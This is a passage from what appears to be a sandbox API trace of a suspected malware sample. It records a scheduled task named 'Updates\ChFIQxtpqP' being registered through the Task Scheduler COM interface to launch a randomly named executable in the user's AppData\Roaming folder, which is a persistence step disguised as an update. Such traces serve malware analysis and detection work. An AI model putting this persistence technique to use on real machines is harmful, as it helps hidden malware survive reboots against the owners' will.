HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp") returned 60 [0183.360] lstrlenW (lpString="-/") returned 2 [0183.360] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0183.360] SetLastError (dwErrCode=0x490) [0183.360] SetLastError (dwErrCode=0x490) [0183.360] SetLastError (dwErrCode=0x0) [0183.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp") returned 60 [0183.360] StrChrIW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp", wMatch=0x3a) returned=":\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp" [0183.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp") returned 60 [0183.360] _memicmp (_Buf1=0x184ca8, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.360] _memicmp (_Buf1=0x184cd8, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.360] SetLastError (dwErrCode=0x7a) [0183.360] SetLastError (dwErrCode=0x0) [0183.360] SetLastError (dwErrCode=0x0) [0183.360] lstrlenW (lpString="C") returned 1 [0183.360] SetLastError (dwErrCode=0x490) [0183.360] SetLastError (dwErrCode=0x0) [0183.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp") returned 60 [0183.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp") returned 60 [0183.360] GetProcessHeap () returned 0x170000 [0183.360] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x7a) returned 0x1869b0 [0183.360] SetLastError (dwErrCode=0x0) [0183.361] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp") returned 60 [0183.361] SetLastError (dwErrCode=0x0) [0183.361] GetProcessHeap () returned 0x170000 [0183.361] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x1fc) returned 0x186a38 [0183.361] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0183.372] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0183.386] CoCreateInstance (in: rclsid=0x60230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x6020fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x12cdd4 | out: ppv=0x12cdd4*=0x353dd0) returned 0x0 [0183.397] TaskScheduler:ITaskService:Connect (This=0x353dd0, serverName=0x12cd44*(varType=0x8, wReserved1=0x0, wReserved2=0xcdb8, wReserved3=0x12, varVal1=0x0, varVal2=0x12d690), user=0x12cd54*(varType=0x0, wReserved1=0x12, wReserved2=0xcddc, wReserved3=0x12, varVal1=0x76779cde, varVal2=0x12d690), domain=0x12cd64*(varType=0x0, wReserved1=0x0, wReserved2=0x1f0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), password=0x12cd74*(varType=0x0, wReserved1=0x0, wReserved2=0x9c39, wReserved3=0x7677, varVal1=0x70, varVal2=0x12d810)) returned 0x0 [0183.402] TaskScheduler:IUnknown:AddRef (This=0x353dd0) returned 0x2 [0183.402] TaskScheduler:ITaskService:GetFolder (in: This=0x353dd0, Path=0x0, ppFolder=0x12ce78 | out: ppFolder=0x12ce78*=0x353e38) returned 0x0 [0183.407] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tmp1b7b.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x108 [0183.407] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x12c768 | out: lpFileSize=0x12c768*=1685) returned 1 [0183.407] ReadFile (in: hFile=0x108, lpBuffer=0x12c770, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x12c778, lpOverlapped=0x0 | out: lpBuffer=0x12c770*, lpNumberOfBytesRead=0x12c778*=0x2, lpOverlapped=0x0) returned 1 [0183.408] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.408] malloc (_Size=0x696) returned 0x3526d8 [0183.409] ReadFile (in: hFile=0x108, lpBuffer=0x3526d8, nNumberOfBytesToRead=0x696, lpNumberOfBytesRead=0x12c778, lpOverlapped=0x0 | out: lpBuffer=0x3526d8*, lpNumberOfBytesRead=0x12c778*=0x695, lpOverlapped=0x0) returned 1 [0183.409] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x3526d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1686 [0183.409] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x3526d8, cbMultiByte=-1, lpWideCharStr=0x19567c, cchWideChar=1686 | out: lpWideCharStr="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n") returned 1686 [0183.409] SysStringLen (param_1="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n") returned 0x695 [0183.409] VarBstrCat (in: bstrLeft=0x0, bstrRight="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n", pbstrResult=0x12c718 | out: pbstrResult=0x12c718) returned 0x0 [0183.410] free (_Block=0x3526d8) [0183.410] CloseHandle (hObject=0x108) returned 1 [0183.410] lstrlenW (lpString="") returned 0 [0183.410] malloc (_Size=0xc) returned 0x353e78 [0183.410] SysStringLen (param_1="") returned 0x0 [0183.410] free (_Block=0x353e78) [0183.410] lstrlenW (lpString="") returned 0 [0183.410] ITaskFolder:RegisterTask (in: This=0x353e38, Path="Updates\\ChFIQxtpqP", XmlText="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n", flags=2, UserId=0x12c754*(varType=0x8, wReserved1=0x0, wReserved2=0x41b0, wReserved3=0x19, varVal1="", varVal2=0x1941b0), password=0x12c764*(varType=0x0, wReserved1=0x19, wReserved2=0x0, wReserved3=0x0, varVal1=0x12c7ec, varVal2=0x76ac7526), LogonType=0, sddl=0x12c778*(varType=0x0, wReserved1=0x19, wReserved2=0x41b0, wReserved3=0x19, varVal1=0x0, varVal2=0x0), ppTask=0x12c7d8 | out: ppTask=0x12c7d8*=0x0) returned 0x800700b7 [0183.426] SetLastError (dwErrCode=0x800700b7) [0183.426] GetLastError () returned 0x800700b7 [0183.427] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x800700b7, dwLanguageId=0x0, lpBuffer=0x12c76c, nSize=0x0, Arguments=0x0 | out: lpBuffer="䟈\x19일\x12鿹a㺮瓌취\x12锵`⥀皁\x01\x01툈幝\x01") returned 0x35 [0183.427] GetLastError () returned 0x800700b7 [0183.427] lstrlenW (lpString="Cannot create a file when that file already exists.\r\n") returned 53 [0183.427] GetProcessHeap () returned 0x170000 [0183.427] GetProcessHeap () returned 0x170000 [0183.427] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184f40) returned 1 [0183.427] GetProcessHeap () returned 0x170000 [0183.427] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184f40) returned 0x2 [0183.427] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184f40 | out: hHeap=0x170000) returned 1 [0183.427] GetProcessHeap () returned 0x170000 [0183.427] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x6c) returned 0x194840 [0183.427] SetLastError (dwErrCode=0x800700b7) [0183.428] GetProcessHeap () returned 0x170000 [0183.428] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x1856e8 [0183.428] _memicmp (_Buf1=0x184c48, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.428] LoadStringW (in: hInstance=0x0, uID=0x1389, lpBuffer=0x1866a8, cchBufferMax=256 | out: lpBuffer="ERROR:") returned 0x6 [0183.428] lstrlenW (lpString="ERROR:") returned 6 [0183.428] GetProcessHeap () returned 0x170000 [0183.428] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0xe) returned 0x191540 [0183.428] GetProcessHeap () returned 0x170000 [0183.428] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x1915b8 [0183.428] _memicmp (_Buf1=0x1915b8, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.428] GetProcessHeap () returned 0x170000 [0183.428] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x1000) returned 0x1970e8 [0183.429] _vsnwprintf (in: _Buffer=0x1970e8, _BufferCount=0x7ff, _Format="%s ", _ArgList=0x12c770 | out: _Buffer="ERROR: ") returned 7 [0183.429] _fileno (_File=0x76812940) returned 2 [0183.429] _errno () returned 0x3507d8 [0183.429] _get_osfhandle (_FileHandle=2) returned 0xb [0183.429] _errno () returned 0x3507d8 [0183.429] GetFileType (hFile=0xb) returned 0x2 [0183.429] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0183.429] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12c708 | out: lpMode=0x12c708) returned 1 [0183.429] __iob_func () returned 0x76812900 [0183.429] __iob_func () returned 0x76812900 [0183.430] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0183.430] lstrlenW (lpString="ERROR: ") returned 7 [0183.430] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x1970e8*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x12c730, lpReserved=0x0 | out: lpBuffer=0x1970e8*, lpNumberOfCharsWritten=0x12c730*=0x7) returned 1 [0183.430] _fileno (_File=0x76812940) returned 2 [0183.430] _errno () returned 0x3507d8 [0183.430] _get_osfhandle (_FileHandle=2) returned 0xb [0183.430] _errno () returned 0x3507d8 [0183.430] GetFileType (hFile=0xb) returned 0x2 [0183.431] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0183.431] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12c734 | out: lpMode=0x12c734) returned 1 [0183.431] __iob_func () returned 0x76812900 [0183.431] __iob_func () returned 0x76812900 [0183.431] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0183.431] lstrlenW (lpString="Cannot create a file when that file already exists.\r\n") returned 53 [0183.431] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x194840*, nNumberOfCharsToWrite=0x35, lpNumberOfCharsWritten=0x12c75c, lpReserved=0x0 | out: lpBuffer=0x194840*, lpNumberOfCharsWritten=0x12c75c*=0x35) returned 1 [0183.431] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x12c7e0 | out: pperrinfo=0x12c7e0*=0x0) returned 0x1 [0183.432] TaskScheduler:IUnknown:Release (This=0x353e38) returned 0x0 [0183.432] TaskScheduler:IUnknown:Release (This=0x353dd0) returned 0x1 [0183.432] lstrlenW (lpString="") returned 0 [0183.432] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp") returned 60 [0183.432] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0183.432] GetProcessHeap () returned 0x170000 [0183.432] GetProcessHeap () returned 0x170000 [0183.432] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x186a38) returned 1 [0183.432] GetProcessHeap () returned 0x170000 [0183.432] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x186a38) returned 0x1fc [0183.432] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x186a38 | out: hHeap=0x170000) returned 1 [0183.432] GetProcessHeap () returned 0x170000 [0183.432] GetProcessHeap () returned 0x170000 [0183.432] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1869b0) returned 1 [0183.432] GetProcessHeap () returned 0x170000 [0183.432] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1869b0) returned 0x7a [0183.432] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1869b0 | out: hHeap=0x170000) returned 1 [0183.432] GetProcessHeap () returned 0x170000 [0183.432] GetProcessHeap () returned 0x170000 [0183.432] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185328) returned 1 [0183.432] GetProcessHeap () returned 0x170000 [0183.432] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185328) returned 0x16 [0183.433] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185328 | out: hHeap=0x170000) returned 1 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184b58) returned 1 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184b58) returned 0x10 [0183.433] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184b58 | out: hHeap=0x170000) returned 1 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185348) returned 1 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185348) returned 0x14 [0183.433] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185348 | out: hHeap=0x170000) returned 1 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x186600) returned 1 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x186600) returned 0xa0 [0183.433] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x186600 | out: hHeap=0x170000) returned 1 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184c30) returned 1 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184c30) returned 0x10 [0183.433] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184c30 | out: hHeap=0x170000) returned 1 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185228) returned 1 [0183.433] GetProcessHeap () returned 0x170000 [0183.433] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185228) returned 0x14 [0183.434] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185228 | out: hHeap=0x170000) returned 1 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x186928) returned 1 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x186928) returned 0x7e [0183.434] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x186928 | out: hHeap=0x170000) returned 1 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184cd8) returned 1 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184cd8) returned 0x10 [0183.434] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184cd8 | out: hHeap=0x170000) returned 1 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1851e8) returned 1 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1851e8) returned 0x14 [0183.434] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1851e8 | out: hHeap=0x170000) returned 1 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184cc0) returned 1 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184cc0) returned 0xc [0183.434] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184cc0 | out: hHeap=0x170000) returned 1 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184ca8) returned 1 [0183.434] GetProcessHeap () returned 0x170000 [0183.434] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184ca8) returned 0x10 [0183.435] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184ca8 | out: hHeap=0x170000) returned 1 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1851c8) returned 1 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1851c8) returned 0x14 [0183.435] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1851c8 | out: hHeap=0x170000) returned 1 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185a10) returned 1 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185a10) returned 0x208 [0183.435] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185a10 | out: hHeap=0x170000) returned 1 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184bd0) returned 1 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184bd0) returned 0x10 [0183.435] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184bd0 | out: hHeap=0x170000) returned 1 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185188) returned 1 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185188) returned 0x14 [0183.435] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185188 | out: hHeap=0x170000) returned 1 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1866a8) returned 1 [0183.435] GetProcessHeap () returned 0x170000 [0183.435] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1866a8) returned 0x200 [0183.436] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1866a8 | out: hHeap=0x170000) returned 1 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184c48) returned 1 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184c48) returned 0x10 [0183.436] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184c48 | out: hHeap=0x170000) returned 1 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185128) returned 1 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185128) returned 0x14 [0183.436] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185128 | out: hHeap=0x170000) returned 1 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1970e8) returned 1 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1970e8) returned 0x1000 [0183.436] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1970e8 | out: hHeap=0x170000) returned 1 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1915b8) returned 1 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1915b8) returned 0x10 [0183.436] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1915b8 | out: hHeap=0x170000) returned 1 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185108) returned 1 [0183.436] GetProcessHeap () returned 0x170000 [0183.436] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185108) returned 0x14 [0183.437] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185108 | out: hHeap=0x170000) returned 1 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1852a8) returned 1 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1852a8) returned 0x14 [0183.437] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1852a8 | out: hHeap=0x170000) returned 1 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184c90) returned 1 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184c90) returned 0x10 [0183.437] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184c90 | out: hHeap=0x170000) returned 1 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1850a8) returned 1 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1850a8) returned 0x14 [0183.437] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1850a8 | out: hHeap=0x170000) returned 1 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1852e8) returned 1 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1852e8) returned 0x16 [0183.437] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1852e8 | out: hHeap=0x170000) returned 1 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184c60) returned 1 [0183.437] GetProcessHeap () returned 0x170000 [0183.437] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184c60) returned 0x10 [0183.438] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184c60 | out: hHeap=0x170000) returned 1 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185070) returned 1 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185070) returned 0x14 [0183.438] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185070 | out: hHeap=0x170000) returned 1 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x194840) returned 1 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x194840) returned 0x6c [0183.438] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x194840 | out: hHeap=0x170000) returned 1 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184f50) returned 1 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184f50) returned 0x14 [0183.438] HeapFree (in: 